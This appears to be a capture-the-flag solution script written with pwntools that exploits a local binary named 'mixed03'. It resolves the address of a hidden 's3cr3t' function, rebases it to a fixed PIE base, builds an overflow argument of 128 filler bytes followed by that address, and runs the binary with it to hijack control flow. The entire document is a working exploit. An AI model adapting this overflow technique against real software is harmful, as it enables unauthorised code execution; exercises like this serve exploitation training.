from pwn import *
import subprocess

context(arch='amd64', os='linux', log_level='info')

secret_addr = ELF('./mixed03').symbols['s3cr3t']
secret_addr = secret_addr - 0x1000 + 0x555555555000

arg = b'}' * 128 + p64(secret_addr).rstrip(b'\x00') + b'{'
print(arg)

subprocess.run(['./mixed03', arg, '-2'])